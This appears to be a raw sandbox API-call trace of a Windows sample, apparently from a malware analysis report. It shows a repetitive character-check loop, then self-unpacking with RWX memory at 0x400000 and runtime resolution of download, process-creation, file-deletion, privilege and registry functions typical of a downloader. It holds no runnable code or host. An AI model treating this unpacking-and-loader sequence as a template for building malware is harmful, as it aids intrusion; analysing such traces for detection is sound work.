0x765c3e8e [0013.310] IsCharLowerA (ch=77) returned 0 [0013.310] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.310] IsCharLowerA (ch=78) returned 0 [0013.310] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.310] IsCharLowerA (ch=79) returned 0 [0013.310] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.310] IsCharLowerA (ch=80) returned 0 [0013.310] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.310] IsCharLowerA (ch=81) returned 0 [0013.310] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.310] IsCharLowerA (ch=82) returned 0 [0013.310] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.310] IsCharLowerA (ch=83) returned 0 [0013.310] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=84) returned 0 [0013.311] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.311] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=85) returned 0 [0013.311] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.311] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=86) returned 0 [0013.311] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.311] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=87) returned 0 [0013.311] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.311] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=88) returned 0 [0013.311] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.311] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=89) returned 0 [0013.311] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.311] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=65) returned 0 [0013.311] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.311] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=66) returned 0 [0013.311] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.311] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=67) returned 0 [0013.311] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.311] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=68) returned 0 [0013.311] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.311] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=69) returned 0 [0013.311] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.311] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=70) returned 0 [0013.311] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.311] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.311] IsCharLowerA (ch=71) returned 0 [0013.312] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.312] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.312] IsCharLowerA (ch=65) returned 0 [0013.312] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.312] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.312] IsCharLowerA (ch=66) returned 0 [0013.312] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.312] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.312] IsCharLowerA (ch=67) returned 0 [0013.312] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.312] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.312] IsCharLowerA (ch=68) returned 0 [0013.312] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.312] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.312] IsCharLowerA (ch=69) returned 0 [0013.312] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.312] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.312] IsCharLowerA (ch=70) returned 0 [0013.312] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.312] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.312] IsCharLowerA (ch=71) returned 0 [0013.312] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.312] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.312] IsCharLowerA (ch=72) returned 0 [0013.312] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.312] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.312] IsCharLowerA (ch=73) returned 0 [0013.312] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.312] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.312] IsCharLowerA (ch=74) returned 0 [0013.312] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.312] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.312] IsCharLowerA (ch=75) returned 0 [0013.312] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.312] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.314] IsCharLowerA (ch=76) returned 0 [0013.314] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.314] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.314] IsCharLowerA (ch=77) returned 0 [0013.314] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.314] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.314] IsCharLowerA (ch=78) returned 0 [0013.314] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.315] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.315] IsCharLowerA (ch=79) returned 0 [0013.315] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.315] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.315] IsCharLowerA (ch=80) returned 0 [0013.315] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.315] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.315] IsCharLowerA (ch=81) returned 0 [0013.315] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.315] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.315] IsCharLowerA (ch=82) returned 0 [0013.315] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.315] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.315] IsCharLowerA (ch=83) returned 0 [0013.315] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.315] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.315] IsCharLowerA (ch=84) returned 0 [0013.315] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.315] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.315] IsCharLowerA (ch=85) returned 0 [0013.315] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.315] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.315] IsCharLowerA (ch=86) returned 0 [0013.315] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.315] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.315] IsCharLowerA (ch=87) returned 0 [0013.315] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.315] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.315] IsCharLowerA (ch=88) returned 0 [0013.315] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.315] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.315] IsCharLowerA (ch=89) returned 0 [0013.315] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.315] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.315] IsCharLowerA (ch=65) returned 0 [0013.315] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.316] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.316] IsCharLowerA (ch=66) returned 0 [0013.316] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.316] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.316] IsCharLowerA (ch=67) returned 0 [0013.316] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.316] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.316] IsCharLowerA (ch=68) returned 0 [0013.316] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.316] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.316] IsCharLowerA (ch=69) returned 0 [0013.316] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.316] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.316] IsCharLowerA (ch=70) returned 0 [0013.316] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.316] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.316] IsCharLowerA (ch=71) returned 0 [0013.316] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.316] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.316] IsCharLowerA (ch=65) returned 0 [0013.316] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.316] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.316] IsCharLowerA (ch=66) returned 0 [0013.316] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.316] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.316] IsCharLowerA (ch=67) returned 0 [0013.316] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.316] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.316] IsCharLowerA (ch=68) returned 0 [0013.316] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.316] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.316] IsCharLowerA (ch=69) returned 0 [0013.316] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.316] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.316] IsCharLowerA (ch=70) returned 0 [0013.316] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=71) returned 0 [0013.317] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=72) returned 0 [0013.317] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=73) returned 0 [0013.317] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=74) returned 0 [0013.317] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=75) returned 0 [0013.317] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=76) returned 0 [0013.317] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=77) returned 0 [0013.317] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=78) returned 0 [0013.317] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=79) returned 0 [0013.317] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=80) returned 0 [0013.317] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=81) returned 0 [0013.317] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=82) returned 0 [0013.317] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.317] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.317] IsCharLowerA (ch=83) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.318] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.318] IsCharLowerA (ch=84) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.318] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.318] IsCharLowerA (ch=85) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.318] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.318] IsCharLowerA (ch=86) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.318] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.318] IsCharLowerA (ch=87) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.318] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.318] IsCharLowerA (ch=88) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.318] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.318] IsCharLowerA (ch=89) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.318] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.318] IsCharLowerA (ch=65) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.318] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.318] IsCharLowerA (ch=66) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.318] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.318] IsCharLowerA (ch=67) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.318] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.318] IsCharLowerA (ch=68) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.318] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.318] IsCharLowerA (ch=69) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.318] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.318] IsCharLowerA (ch=70) returned 0 [0013.318] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.319] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.319] IsCharLowerA (ch=71) returned 0 [0013.319] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.319] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.319] IsCharLowerA (ch=65) returned 0 [0013.319] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.319] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.319] IsCharLowerA (ch=66) returned 0 [0013.319] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.319] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.319] IsCharLowerA (ch=67) returned 0 [0013.319] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.319] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.319] IsCharLowerA (ch=68) returned 0 [0013.319] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.319] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.319] IsCharLowerA (ch=69) returned 0 [0013.319] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.319] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.319] IsCharLowerA (ch=70) returned 0 [0013.319] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.319] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.319] IsCharLowerA (ch=71) returned 0 [0013.319] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.319] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.319] IsCharLowerA (ch=72) returned 0 [0013.319] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.319] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.319] IsCharLowerA (ch=73) returned 0 [0013.319] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.319] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.319] IsCharLowerA (ch=74) returned 0 [0013.319] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.319] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.319] IsCharLowerA (ch=75) returned 0 [0013.319] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.320] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.387] VirtualFree (lpAddress=0x2c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0013.388] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6f, flAllocationType=0x3000, flProtect=0x4) returned 0x2c0000 [0013.388] VirtualAlloc (lpAddress=0x0, dwSize=0x6e00, flAllocationType=0x3000, flProtect=0x4) returned 0x2d0000 [0013.390] VirtualFree (lpAddress=0x2c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0013.390] VirtualFree (lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0013.393] VirtualProtect (in: lpAddress=0x400000, dwSize=0x15000, flNewProtect=0x40, lpflOldProtect=0x18fa00 | out: lpflOldProtect=0x18fa00*=0x80) returned 1 [0013.396] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x18fa00 | out: lpflOldProtect=0x18fa00*=0x40) returned 1 [0013.396] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x765b0000 [0013.396] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x765b0000 [0013.396] GetProcAddress (hModule=0x765b0000, lpProcName="CreateProcessA") returned 0x765c1072 [0013.396] GetProcAddress (hModule=0x765b0000, lpProcName="DeleteFileA") returned 0x765c5444 [0013.396] GetProcAddress (hModule=0x765b0000, lpProcName="MoveFileExA") returned 0x765eccc1 [0013.396] GetProcAddress (hModule=0x765b0000, lpProcName="ExpandEnvironmentStringsA") returned 0x765deb39 [0013.396] GetProcAddress (hModule=0x765b0000, lpProcName="GetTempPathW") returned 0x765dd4dc [0013.396] GetProcAddress (hModule=0x765b0000, lpProcName="CopyFileW") returned 0x765e830d [0013.396] GetProcAddress (hModule=0x765b0000, lpProcName="WaitForSingleObject") returned 0x765c1136 [0013.396] GetProcAddress (hModule=0x765b0000, lpProcName="CopyFileA") returned 0x765e58e5 [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="ExpandEnvironmentStringsW") returned 0x765c4173 [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="CreateProcessW") returned 0x765c103d [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="GetExitCodeProcess") returned 0x765d174d [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="OpenEventA") returned 0x765c4a45 [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="GetModuleFileNameA") returned 0x765c14b1 [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="Sleep") returned 0x765c10ff [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="ExitProcess") returned 0x765c7a10 [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="GetTickCount") returned 0x765c110c [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="GetVersionExA") returned 0x765c3519 [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="GetModuleHandleA") returned 0x765c1245 [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="VirtualFree") returned 0x765c186e [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="VirtualAlloc") returned 0x765c1856 [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="GetLastError") returned 0x765c11c0 [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="GetProcAddress") returned 0x765c1222 [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="DeleteFileW") returned 0x765c89b3 [0013.397] GetProcAddress (hModule=0x765b0000, lpProcName="CloseHandle") returned 0x765c1410 [0013.397] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77560000 [0013.397] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77560000 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="strstr") returned 0x775dc780 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="atoi") returned 0x775ad2f3 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="ZwSetValueKey") returned 0x775801b4 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="_snwprintf") returned 0x77592417 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="_itoa") returned 0x775ad2c6 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="strncat") returned 0x775dc570 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="strncpy") returned 0x775d5c30 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="sscanf") returned 0x776354a7 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="RtlRandom") returned 0x776298c3 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="_snprintf") returned 0x77634760 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="_vsnprintf") returned 0x775d9d88 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="memset") returned 0x7758df20 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="RtlAdjustPrivilege") returned 0x77611f40 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="ZwCreateKey") returned 0x7757fb30 [0013.398] GetProcAddress (hModule=0x77560000, lpProcName="_chkstk") returned 0x7759ad68 [0013.398] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x0 [0013.398] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75380000 [0013.427] GetProcAddress (hModule=0x75380000, lpProcName=0x3) returned 0x75383918 [0013.427] GetProcAddress (hModule=0x75380000, lpProcName=0x13) returned 0x75386f01 [0013.427] GetProcAddress (hModule=0x75380000, lpProcName=0x4) returned 0x75386bdd [0013.427] GetProcAddress (hModule=0x75380000, lpProcName=0x34) returned 0x75397673 [0013.427] GetProcAddress (hModule=0x75380000, lpProcName=0x17) returned 0x75383eb8 [0013.427] GetProcAddress (hModule=0x75380000, lpProcName=0x73) returned 0x75383ab2 [0013.427] GetProcAddress (hModule=0x75380000, lpProcName=0x10) returned 0x75386b0e [0013.427] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x77100000 [0013.427] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x77100000 [0013.427] GetProcAddress (hModule=0x77100000, lpProcName="PathFileExistsA") returned 0x7713ad1a [0013.427] GetProcAddress (hModule=0x77100000, lpProcName="PathFindFileNameW") returned 0x7711bb71 [0013.428] GetProcAddress (hModule=0x77100000, lpProcName="PathAppendW") returned 0x771181ef [0013.428] GetProcAddress (hModule=0x77100000, lpProcName="StrStrIA") returned 0x7710d250 [0013.428] GetProcAddress (hModule=0x77100000, lpProcName="SHGetValueA") returned 0x7710cf09 [0013.428] GetModuleHandleA (lpModuleName="urlmon.dll") returned 0x0 [0013.428] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76470000 [0013.736] GetProcAddress (hModule=0x76470000, lpProcName="URLDownloadToCacheFileW") returned 0x764ae4a0 [0013.736] GetModuleHandleA (lpModuleName="RPCRT4.dll") returned 0x753c0000 [0013.736] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x753c0000 [0013.736] GetProcAddress (hModule=0x753c0000, lpProcName="UuidCreateSequential") returned 0x753e7c12 [0013.736] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x76be0000 [0013.736] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x76be0000 [0013.736] GetProcAddress (hModule=0x76be0000, lpProcName="InternetCrackUrlA") returned 0x76bed075 [0013.737] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x76760000 [0013.737] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76760000 [0013.737] GetProcAddress (hModule=0x76760000, lpProcName="OpenProcessToken") returned 0x76774304 [0013.737] GetProcAddress (hModule=0x76760000, lpProcName="RegSetKeySecurity") returned 0x7676b2d4 [0013.737] GetProcAddress (hModule=0x76760000, lpProcName="RegCloseKey") returned 0x7677469d [0013.737] GetProcAddress (hModule=0x76760000, lpProcName="GetSidSubAuthority") returned 0x76770e24 [0013.737] GetProcAddress (hModule=0x76760000, lpProcName="GetSidSubAuthorityCount") returned 0x76770e0c [0013.737] GetProcAddress (hModule=0x76760000, lpProcName="RegCreateKeyExA") returned 0x76771469 [0013.737] GetProcAddress (hModule=0x76760000, lpProcName="RegSetValueExW") returned 0x767714d6 [0013.737] GetProcAddress (hModule=0x76760000, lpProcName="RegFlushKey") returned 0x7678773f [0013.737] GetProcAddress (hModule=0x76760000, lpProcName="GetTokenInformation") returned 0x7677431c [0013.737] GetProcAddress (hModule=0x76760000, lpProcName="RegOpenKeyExA") returned 0x76774907 [0013.737] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x0 [0013.737] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75790000 [0014.513] GetProcAddress (hModule=0x75790000, lpProcName="ShellExecuteExW") returned 0x757b1e46 [0014.513] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x75570000 [0014.513] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75570000 [0014.513] GetProcAddress (hModule=0x75570000, lpProcName="OleInitialize") returned 0x7558efd7 [0014.514] GetProcAddress (hModule=0x75570000, lpProcName="CoCreateInstance") returned 0x755b9d0b [0014.514] GetModuleHandleA (lpModuleName="OLEAUT32.dll") returned 0x763e0000 [0014.514] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x763e0000 [0014.514] GetProcAddress (hModule=0x763e0000, lpProcName=0x6) returned 0x763e3e59 [0014.514] GetProcAddress (hModule=0x763e0000, lpProcName=0x2) returned 0x763e4642 [0014.514] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x40, lpflOldProtect=0x18fa00 | out: lpflOldProtect=0x18fa00*=0x4) returned 1 [0014.514] 